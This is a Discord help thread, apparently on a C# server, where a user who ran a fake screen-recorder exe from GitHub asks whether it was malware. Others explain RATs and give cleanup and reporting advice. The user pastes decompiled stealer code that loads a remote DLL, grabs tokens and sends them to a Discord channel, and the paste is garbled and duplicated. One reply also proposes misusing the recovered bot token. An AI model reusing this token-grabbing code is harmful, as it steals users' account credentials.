C
C#4mo ago
Ramsey

✅ did i install a malware?

hello there i was trying to find a screen recording app on github so i found this repo and it had instructions and everything but the project was only an exe, so i installed it and i thought it was a false postive (i know im dumb) anyway after then when i tried to open the exe file nothing appears at all, so i figured it is a malware or something, then i tried to unpack the exe so i searched for methods to decompile and eventually i happened to find an app called dotpeek, i managed to decompile the app and eventually found the source code and it was this as shown in the picture below, i dont know what information from me was stolen, but i am here to ask what is a discord rat what does this even mean whats the purpose of this porject if anyone knows also the app included the token of the discord bot and a guid id, what can i do with these
No description
55 Replies
Jimmacle
Jimmacle4mo ago
report it to discord and stop clicking sketchy links or running sketchy programs without seeing the rest of the code i would guess it tries to either steal your discord token and/or send messages from your account or it's the other way and they're using a discord server as a way to run commands on your PC
Ramsey
Ramsey4mo ago
what do i do with the bot token and the guild id that i retrived, i am a complete beginner, is it legal to login into it and find what information is there or do i just report it to discord
Jimmacle
Jimmacle4mo ago
you're better off just reporting it give them that information so they can shut down the server and whoever made the malware
SpReeD
SpReeD4mo ago
RAT is an abbrev. for Remote Administration Tool, yes, it's a cover name for a certain type of a trojan since the late 90s
mg
mg4mo ago
and here's a legitimate screen recorder https://obsproject.com/
Open Broadcaster Software | OBS
OBS (Open Broadcaster Software) is free and open source software for video recording and live streaming. Stream to Twitch, YouTube and many other providers or record your own videos with high quality H264 / AAC encoding.
Buddy
Buddy4mo ago
RATs are the worst kinds of malware after ransomwares of course. As your PC turns into a Zombie basically. The attacker gains full control of your machine. If it's truly a "RAT" and not some person unaware of its meaning and just heard about it. It's basically if you had TeamViewer on 24/7 and they can access everything
mg
mg4mo ago
i'd rather be ransomwared than have someone have access to my machine
Buddy
Buddy4mo ago
RATs can be recovered from, you're toast with ransomwares
mg
mg4mo ago
if you keep backups then the recovery from a ransomware attack is just wiping your machine and restoring from a backup
Buddy
Buddy4mo ago
Just check autostart, temp directories, etc. Sysinternals autoruns is a great tool for that
ACiDCA7
ACiDCA74mo ago
just out of interest, how do you get from screenrecoder to something discordrelated? i mean even the assembly is called discordrat
Ramsey
Ramsey4mo ago
what do you mean ah probably pasted in multiple applications
ACiDCA7
ACiDCA74mo ago
when you want to download a screenrecorder, and you download something expecting a screenrecorder there should go all alarms up if what you download is called discord***
Buddy
Buddy4mo ago
https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns
Autoruns for Windows - Sysinternals
See what programs are configured to startup automatically when your system boots and you login.
Buddy
Buddy4mo ago
Install this Delete everything that does not belong
ACiDCA7
ACiDCA74mo ago
malwarebytes wouldnt hurt aswell
Ramsey
Ramsey4mo ago
well im no expert in computer science but the exe and the repo instructions has nothing to do with discord except for the code itself i also found something interesting 
public static async Task get_tokens(string channelid)
{
  if (!Program.dll_holder.ContainsKey("token"))
    await Program.LoadDll("token", await Program.LinkToBytes(Program.dll_url_holder["token"]));
  if (!Program.activator_holder.ContainsKey("token"))
    Program.activator_holder["token"] = Activator.CreateInstance(Program.dll_holder["token"].GetType("Token_grabber.grabber"));
  object obj = Program.activator_holder["token"];
  string input = string.Join("\n\n", (IEnumerable<string>) obj.GetType().GetMethod("grab").Invoke(obj, new object[0]));
  if (input.Length >= 1990)
  {
    string channelid1 = channelid;
    List<byte[]> attachments = new List<byte[]>();
    attachments.Add(Program.StringToBytes(input));
    string[] filenames = new string[1]{ "tokens.txt" };
    int num1 = await Program.Send_attachment(channelid1, "", attachments, filenames) ? 1 : 0;
    int num2 = await Program.Send_message(channelid, "Command executed!") ? 1 : 0;
  }
  else
  {
    int num3 = await Program.Send_message(channelid, "
public static async Task get_tokens(string channelid)
{
  if (!Program.dll_holder.ContainsKey("token"))
    await Program.LoadDll("token", await Program.LinkToBytes(Program.dll_url_holder["token"]));
  if (!Program.activator_holder.ContainsKey("token"))
    Program.activator_holder["token"] = Activator.CreateInstance(Program.dll_holder["token"].GetType("Token_grabber.grabber"));
  object obj = Program.activator_holder["token"];
  string input = string.Join("\n\n", (IEnumerable<string>) obj.GetType().GetMethod("grab").Invoke(obj, new object[0]));
  if (input.Length >= 1990)
  {
    string channelid1 = channelid;
    List<byte[]> attachments = new List<byte[]>();
    attachments.Add(Program.StringToBytes(input));
    string[] filenames = new string[1]{ "tokens.txt" };
    int num1 = await Program.Send_attachment(channelid1, "", attachments, filenames) ? 1 : 0;
    int num2 = await Program.Send_message(channelid, "Command executed!") ? 1 : 0;
  }
  else
  {
    int num3 = await Program.Send_message(channelid, "
" + input + "
") ? 1 : 0;
    int num4 = await Program.Send_message(channelid, "Command executed!") ? 1 : 0;
  }
}
.
") ? 1 : 0;
    int num4 = await Program.Send_message(channelid, "Command executed!") ? 1 : 0;
  }
}
.
and this string
Jimmacle
Jimmacle4mo ago
yes, it probably hijacks your discord account to spam messages to spread the malware and 100% allows the attacker to control your PC so you should get rid of this software asap using the tools the others mentioned
Ramsey
Ramsey4mo ago
No description
Jimmacle
Jimmacle4mo ago
if you're lucky it's not particularly embedded in your system and you can just delete it
Ramsey
Ramsey4mo ago
No description
Jimmacle
Jimmacle4mo ago
which, if they're using a discord server as a C&C server they're probably not smart enough to make it very persistent
MODiX
MODiX4mo ago
Buddy
As your PC turns into a Zombie basically. The attacker gains full control of your machine. If it's truly a "RAT" and not some person unaware of its meaning and just heard about it.
Quoted by
<@203166497198047232> from #did i install a malware? (click here)
React with ❌ to remove this embed.
ACiDCA7
ACiDCA74mo ago
hmm why did nobody recommend removing internetconnection yet? so it cant infect potentially other devices + no remote access
Buddy
Buddy4mo ago
Good question
Ramsey
Ramsey4mo ago
at the beginning it was almost impossible to simply delete the file but i managed with norton antivirus
Buddy
Buddy4mo ago
Boot up in safe mode, no internet. Run malwarebytes, after that run autostart and start deleting suspicious entries
exixt
exixt4mo ago
and then delete Norton because it's overflow and windows defender today is enough, it's actually good, not like 10 years ago and run malwarebytes for spot checks every now and then, that's it and after that never download random exes, that's internet 101
mg
mg4mo ago
you should also report that repository to github if that's where the executabnle is hosted
Ramsey
Ramsey4mo ago
does github even care
Jimmacle
Jimmacle4mo ago
very much
exixt
exixt4mo ago
yes
mg
mg4mo ago
yes
Jimmacle
Jimmacle4mo ago
Jimmacle
Jimmacle4mo ago
using their site to distribute malware counts as abuse
ACiDCA7
ACiDCA74mo ago
just did a random search on github for discord rat.. well.. ms has to do some cleanup
Ramsey
Ramsey4mo ago
one extra question, about the dotpeek, does it actually decompile or just gives a c# representation of the binary i am going to reset my pc anyway
SG97
SG974mo ago
I hope you mean clean install
Ramsey
Ramsey4mo ago
reinstall os
ACiDCA7
ACiDCA74mo ago
it does decompile as best as it can.. it only has the information stored in the assembly but dotnet apps are pretty easy to decompile
SG97
SG974mo ago
because to me, resetting != clean install
Ramsey
Ramsey4mo ago
dude i have his bot token lol im not completely sure if its legal to do anything with it at this point, but the owner have literally done something terrible
ACiDCA7
ACiDCA74mo ago
report it
Ramsey
Ramsey4mo ago
already did im talking about using it to access the info about this malware though before discord shuts it down
ACiDCA7
ACiDCA74mo ago
i bet the token doesnt matter too much, its just to get pings if a victim falls for the scam. as you showed in another screenshot it wreaks more havoc beside sending couple messages via discord
Ramsey
Ramsey4mo ago
probably has a server channel' contains a text list of victims
ACiDCA7
ACiDCA74mo ago
why are you still here? go fix your pc to not be a potential hazard
Jimmacle
Jimmacle4mo ago
that's exactly what decompiling is it translates the IL into equivalent C#
Ramsey
Ramsey4mo ago
im on a diff pc
Jimmacle
Jimmacle4mo ago
which is why you should report it to discord so they can handle it not to be rude but you ignored your AV and installed a RAT, you shouldn't be trying to get justice yourself
Ramsey
Ramsey4mo ago
yeah sent a ticket
Anu6is
Anu6is4mo ago
That's not possible. The token gives you access to the bot account... The application on discord. But it doesn't give you access to the code they use the token with.
Buddy
Buddy4mo ago
I personally would spam the authors channel with the bot so the author is forced to regenerate bot token and then all their malwares stops working
Unknown User
Unknown User4mo ago
Message Not Public
Sign In & Join Server To View
Bob l'éponge
Bob l'éponge4mo ago
oof
No description
Want results from more Discord servers?
Add your server